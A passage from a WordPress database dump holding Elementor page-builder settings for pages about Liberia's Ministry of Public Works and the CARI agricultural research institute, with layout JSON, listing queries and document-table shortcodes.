page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(17954,1598,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(17955,2644,'_elementor_edit_mode','builder'),(17956,2644,'_elementor_template_type','wp-post'),(17957,2644,'_elementor_version','2.7.5'),(17958,2644,'_wp_page_template','default'),(17959,2644,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2f27869\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Department of Public Works was created by an Act of the National Legislature in 1928, and was later changed to the Ministry of Public Works in 1972 to adequately administer the Engineering component of the State in terms of surveying, drafting\\/designing, construction and supervision, to improve and maintain, direct or by contract all highways, bridges, roads, streets, airport, seaport, and all other public infrastructure in the Republic of Liberia.<\\/p><p>The Ministry sole purposes are surveying, drafting and designing construction and supervising construction contracts, and the maintenance of roads, bridges, and public buildings.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f5a6a81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"646acf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f3f146c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e9d71cf\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mpw\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"dae3b98\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mpw\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(17962,2645,'_elementor_edit_mode','builder'),(17963,2645,'_elementor_template_type','wp-post'),(17964,2645,'_elementor_version','2.7.5'),(17965,2645,'_wp_page_template','default'),(17966,2645,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2f27869\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Department of Public Works was created by an Act of the National Legislature in 1928, and was later changed to the Ministry of Public Works in 1972 to adequately administer the Engineering component of the State in terms of surveying, drafting\\/designing, construction and supervision, to improve and maintain, direct or by contract all highways, bridges, roads, streets, airport, seaport, and all other public infrastructure in the Republic of Liberia.<\\/p><p>The Ministry sole purposes are surveying, drafting and designing construction and supervising construction contracts, and the maintenance of roads, bridges, and public buildings.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"321d2cc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a8d61b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5373839\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe27600\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mpw\\\",\\\"tag_id\\\":\\\"63\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mpw\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"dae3b98\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mpw\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(17967,1594,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(17968,2646,'_elementor_edit_mode','builder'),(17969,2646,'_elementor_template_type','wp-post'),(17970,2646,'_elementor_version','2.7.5'),(17971,2646,'_wp_page_template','default'),(17972,2646,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"20cbe9f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>CARI\'s strategy is designed to enhance the its capacity, research and development (R&amp;D) partners to react rapidly to the needs of the stakeholders on knowledge, information and technologies (KIT) required pursuing effective management of natural resources for agriculture and environment in Liberia.<\\/p><p>CARI strategy also provides the focus and guiding principles for achieving a client-oriented and demand-led research for development, with special emphasis on smallholder farmers and entrepreneurs in the agricultural sector.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(17975,2647,'_elementor_edit_mode','builder'),(17976,2647,'_elementor_template_type','wp-post'),(17977,2647,'_elementor_version','2.7.5'),(17978,2647,'_wp_page_template','default'),(17979,2647,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"20cbe9f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>CARI\'s strategy is designed to enhance the its capacity, research and development (R&amp;D) partners to react rapidly to the needs of the stakeholders on knowledge, information and technologies (KIT) required pursuing effective management of natural resources for agriculture and environment in Liberia.<\\/p><p>CARI strategy also provides the focus and guiding principles for achieving a client-oriented and demand-led research for development, with special emphasis on smallholder farmers and entrepreneurs in the agricultural sector.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3d3914\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"70602b6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"237f6997\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"321f3817\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mme\\\",\\\"tag_id\\\":\\\"60\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mme\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"32aca63d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"2da625e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"76368934\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f4d863d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mme\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(17981,2648,'_elementor_edit_mode','builder'),(17982,2648,'_elementor_template_type','wp-post'),(17983,2648,'_elementor_version','2.7.5'),(17984,2648,'_wp_page_template','default'),(17985,2648,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"20cbe9f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>CARI\'s strategy is designed to enhance the its capacity, research and development (R&amp;D) partners to react rapidly to the needs of the stakeholders on knowledge, information and technologies (KIT) required pursuing effective management of natural resources for agriculture and environment in Liberia.<\\/p><p>CARI strategy also provides the focus and guiding principles for achieving a client-oriented and demand-led research for development, with special emphasis on smallholder farmers and entrepreneurs in the agricultural sector.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3d3914\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"70602b6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"237f6997\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"321f3817\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"cari\\\",\\\"tag_id\\\":\\\"49\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"cari\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"32aca63d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_